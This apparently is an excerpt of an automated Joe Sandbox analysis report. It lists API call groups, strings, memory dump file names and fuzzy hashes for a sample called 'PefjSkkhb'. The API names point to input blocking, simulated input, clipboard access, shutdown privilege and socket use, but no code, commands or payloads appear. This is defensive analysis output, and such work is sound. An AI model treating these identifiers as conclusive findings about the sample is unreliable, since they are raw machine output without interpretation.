                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2395222682-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 312131281-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1737998785-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                    • API String ID: 4047182710-1173974218
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1957940570-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                    • String ID: ?
                                                                                                                                                                                                                    • API String ID: 500310315-1684325040
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 540024437-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                    • API String ID: 0-572801152
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1239891234-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1413079979-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                    • API String ID: 1927845040-438819550
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4170576061-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                                                    • API String ID: 3769357847-24824748
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _handle_error
                                                                                                                                                                                                                    • String ID: !$VUUU$fmod
                                                                                                                                                                                                                    • API String ID: 1757819995-2579133210
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF656CF2D60
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CEB184: GetCurrentProcess.KERNEL32(00007FF656CEB21D), ref: 00007FF656CEB1B1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: *$.$.
                                                                                                                                                                                                                    • API String ID: 2518042432-2112782162
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                    • API String ID: 2163645468-3733053543
                                                                                                                                                                                                                    • Opcode ID: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                                                                                                                                                                    • Instruction ID: 7a035bb0c3e97edf79d4b36a778438dadeb8b2bab8c01303e753c922a1b65448
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F119132F1860282E724CB25E84117E7252BF84750F4D4735E54EE3AA9EF3ED845C740
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF656CD5C43
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                    • API String ID: 389471666-631824599
                                                                                                                                                                                                                    • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                                                                                                                                                    • Instruction ID: 79eb736fa1972f83c833415a839fc0d608867b0beea7d46fa77a4b1208f7755b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7114C72A18B8297E7049B66D6543B933B4FB48385F884635C64DD6A54EF3EE0B8C710
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 2574300362-199464113
                                                                                                                                                                                                                    • Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                                                                                                                                                    • Instruction ID: 02ff558e5109948ce41e938f72dae2f6785fb2b5a9a29303c918269c97a4c91d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72E0ED21909B0681EF54CB54E81476823E5FB18B49F8C0B35D95D95364EFBED998C340
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Variant$ClearInit$CopyCreateInitializeInstanceUninitialize
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2733932498-0
                                                                                                                                                                                                                    • Opcode ID: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                                                                                                                                                                    • Instruction ID: b33c0ee257f49f29d3632f8d02bb7d14502d13c6d4f581f5f926a1d255473a86
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EB18D66B04B9681EB10DF26D4906BD2760FB48FD4F4D5632DE4EA7796CE7AE880C340
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1083639309-0
                                                                                                                                                                                                                    • Opcode ID: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                                                                                                                                                                    • Instruction ID: e28533e1070d5844e2aeac63c86fb5793ade6d65d8e239e88c4283e893f78904
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77419736A18A8285E710DF51E8401BE7374FB44B84F984632EE8EA7765DFBED545C700
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3541575487-0
                                                                                                                                                                                                                    • Opcode ID: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                                                                                                                                                                    • Instruction ID: db5ff5663728164251a6780c1f95401793cb79be8497d2e063b865fb5a3baa77
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B518872B08A8281EB14DF26D4902AC7760FB88B94F484732CB5E977A5CF7EE591C700
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1682464887-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2278415577-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 33631002-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3429775523-0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: .
                                                                                                                                                                                                                    • API String ID: 0-248832578
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF656CE475C,?,?,00000000,00007FF656CE47D9,?,?,?,?,?,00007FF656D32210), ref: 00007FF656CEBF3F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Time$FileSystem
                                                                                                                                                                                                                    • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                                                                                                    • API String ID: 2086374402-595813830
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 81990902-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileInternetRead_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 101623796-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InputSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3431551938-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: mouse_event
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2434400541-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BlockInput
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3456056419-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: NameUser
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2645101109-0
                                                                                                                                                                                                                    • Opcode ID: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                                                                                                                                                                    • Instruction ID: b59f2a33269821e8ea5410a2e57a31608120623c6809ee0455495389b27d0b91
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90C002B1614652D9E760DF64D8845DC3331FB1075CF945221E61A5E568DF7D9648C340
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                                                                                                                                                                    • Instruction ID: 5379e05ec0eeefe04ba378191ceeacf9ef750f66694046892b890908c015306b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4F06871B182958ADB94CF2CA45262977E0E70C384F54C939D58DD3F44DE3D9460DF04
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                                                                                                                                                                    • Instruction ID: a3a319fff4ad5766048e5cda654f84b2f4585ef9de061684c3d2a6b4f01de2bc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FAA002A594EC42D4E7048B40E8500303330EB50351B9D0A73D00DE1471DF3EA4C1C350
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3521893082-0
                                                                                                                                                                                                                    • Opcode ID: 62288e6044eeb51ceaca558ce081e20657d436a920c90360f4dff7bd8b59143b
                                                                                                                                                                                                                    • Instruction ID: c359daf1fa3415ffabcd360bb0bf7f781dd1f1f77e0259697fe6ec5a45ca63de
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62288e6044eeb51ceaca558ce081e20657d436a920c90360f4dff7bd8b59143b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FA19F72F08A0286EB249B61D84457D3761FB99BA4F184B34DE2EA7BD4DF3DA484C740
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                    • Opcode ID: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                                                                                                                                                                    • Instruction ID: 1a973d759d2b1b3ad4e02843e9e062b3382a077e552105bc0e486a53cb2e53c4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23B19B66B0CA0294EA64DB29D9540BC2361BB40BC5FAC5B31D90EF76A8DF7FE944C300
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1996641542-0
                                                                                                                                                                                                                    • Opcode ID: 456618ac8a95d24da361eef2387faddad64259921dc32d60f8fff8d32782d413
                                                                                                                                                                                                                    • Instruction ID: 6df8fe8c9f57a307057dc3f7827dd7e445533f71cac9625cbabad9cdfdcc5a59
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 456618ac8a95d24da361eef2387faddad64259921dc32d60f8fff8d32782d413
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E719136A08A4186EB34DB25E84467A7361FBC9BA0F084735DE6E97B94DF3DE484C700
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
